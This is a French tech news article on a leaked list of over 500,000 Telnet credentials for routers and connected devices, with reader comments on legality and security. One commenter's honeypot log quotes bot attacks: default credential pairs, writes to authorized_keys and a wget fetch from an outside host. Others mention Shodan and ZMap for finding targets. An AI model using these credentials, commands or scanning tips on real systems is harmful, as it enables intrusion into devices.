Les identifiants de plus de 500 000 routeurs, serveurs et objets connectés publiés sur un forum
Le 22 janvier 2020 à 09h33
2 min
Internet
Internet
La liste contient l’adresse IP, le nom d’utilisateur et le mot de passe pour se connecter à distance via Telnet, comme le rapporte ZDNet.com. Il est ainsi possible de prendre le contrôle de la machine à distance.
Nos confrères ont pu s’entretenir avec le pirate, qui leur explique que cette base a été construite en « scannant » le Net à la recherche de machines répondant à une demande de connexion Telnet (généralement sur le port 23). Il a ensuite essayé des identifiants par défaut ou des combinaisons faciles à deviner.
ZDNet.com n’a par contre pas tenté de se connecter directement aux machines de la liste, « car cela serait illégal ». Impossible donc d’estimer quel pourcentage d'identifiants était encore valable.
Le pirate explique à nos confrères qu’il a décidé de publier cette liste car il a changé son « business model ». Il propose des services de DDoS à la demande et, plutôt que s’appuyer sur des bots, il est passé à « un nouveau modèle reposant sur la location de serveurs auprès de fournisseurs de services cloud ».
ZDNet.com indique enfin avoir partagé cette liste avec des chercheurs en cybersécurité qui se sont portés volontaire pour contacter les propriétaires des machines concernées.
Le 22 janvier 2020 à 09h33
Commentaires (20)
Vous devez être abonné pour pouvoir commenter.
Déjà abonné ? Se connecter
Abonnez-vousLe 22/01/2020 à 10h12
“Le pirate”, est-ce-que scanner le port telnet sur des routeurs au pif, s’y connecter et essayer les identifiants par défaut, c’est du hack?
J’imagine que oui, mais c’est vraiment très très léger…
Le 22/01/2020 à 10h16
S’il y en a 500 000, c’est pas Madame Michue qui peut le faire. Ça demande à mettre en place une infrastructure pour scanner … “tous les IPs”.
Le 22/01/2020 à 10h34
Oui
Article 323-1 du code pénal: Le fait d’accéder ou de se maintenir, frauduleusement, dans tout ou partie d’un système de traitement automatisé de données est puni de deux ans d’emprisonnement et de 30000 euros d’amende.
La difficulté technique de l’intrusion n’influe pas sur la légalité de l’acte.
Le 22/01/2020 à 10h36
Je parlais pas de ça, plutôt du terme “pirate”.
Le 22/01/2020 à 10h37
je crois que la Justice avait répondu à une question un peu subsidiaire, mais qui donne une bonne indication sur où pencherait la balance en cas de procès : voir le cas Bluetouff, où il avait obtenu des fichiers disponibles de façon triviale, mais hébergés dans un endroit où il était “évident” qu’il n’avait pas à être.
Le 22/01/2020 à 10h46
Je check.
Merci. " />
Après je sais que quand j’avais eu des cours sur la sécurité informatique, on ne pouvait pas accéder à un système informatique même si celui-ci était ouvert sur le net et sans mot de passe, on avait trouvé une université je crois.
Le 22/01/2020 à 10h47
Ou utiliser ZMap sur un serveur loué pour l’occasion afin de profiter d’une connection largement meilleur que celle à la maison pour boucler le tout en 1h ou 2 ?
Le 22/01/2020 à 11h04
C’est comme les recettes de cuisines c’est dans les vieux pots que l’on fait les meilleures soupes…..
une prise de contrôle via telnet, simple, efficace et qui peut faire bcp plus mal vu qu’on attaque le réseau dans sa globalité, les routages de inter Vlans etc… SI c’est sur un cœur réseau yesssssssssss.
Après cela montre qu’il y a encore beaucoup de chemin à parcourir en sécurité dans les entreprises et chez les particuliers. Je serai curieux de savoir si il y a de grosses structures, autant une PMe je peux comprendre, mais chez les gros il y a des ressources tech en SI, en sécurité, des contrats de maintenance, des audits. :)
Le 22/01/2020 à 11h19
Il existe déjà des moteurs de recherche qui peuvent pas mal aider pour cibler les IPs a tester
https://www.shodan.io/search?query=telnet
Le 22/01/2020 à 11h28
Le 22/01/2020 à 11h30
meuuuh non, c’est pour la recherche (comme la chasse à la baleine des Japonais)
Le 22/01/2020 à 11h38
Dans le lot, il doit y avoir mon pot de miel (“honeypot”, en anglosaxonien) à la maison puisqu’il répond en telnet (port 23) et SSH (port 22) et accepte tous les logins / mots de passe essayés (souvent root/admin), puis enregistre les commandes tapées (de uname à wget). Bref, une telle base constituée automatiquement va comporter un certain nombre de faux positifs.
PS : Shodan fournit déjà la liste des machines qui répondent en telnet.
Le 22/01/2020 à 12h14
Magnifique Stéphane, je pense que je vais me monter ça aussi " />
(et merci pour ton blog)
Le 22/01/2020 à 12h37
Pour moi le hack c’est quelque chose de difficile à faire techniquement, pas nécessairement illégal.
Le piratage est illégal, mais pas forcément difficile techniquement.
Le 22/01/2020 à 12h43
Le 22/01/2020 à 12h52
Vérifie si son NAS a le port 23 d’ouvert…
A priori, je n’ai pas le 23 d’ouvert, le pare-feu de mon Syno est activé et je n’ai d’ouvert que les ports pour les services qui m’intéressent (NFS et Cloud par exemple).
J’ai quand même mis en fonction la notification du pare-feu au cas où. Si j’ai des alertes là-dessus, je verrais bien.
Le 22/01/2020 à 13h04
C’est très rigolo de regarder ce que tapent les bots. Ce matin :
root / root@1234 et admin / 123456 -> écriture dans .ssh/authorized_keys
admin / admin -> wgethttp://parabellum.ddnsgeek.com" />08…
root / root ->
ps -ef | grep ‘[Mm]iner’
Le 22/01/2020 à 14h55
Le 22/01/2020 à 18h00
Y a encore des gens qui utilisent Telnet Oo’ ?
Le 23/01/2020 à 08h32
SSH c’est 2006, il faut laisser aux fournisseurs de matériel le temps de se mettre à jour " />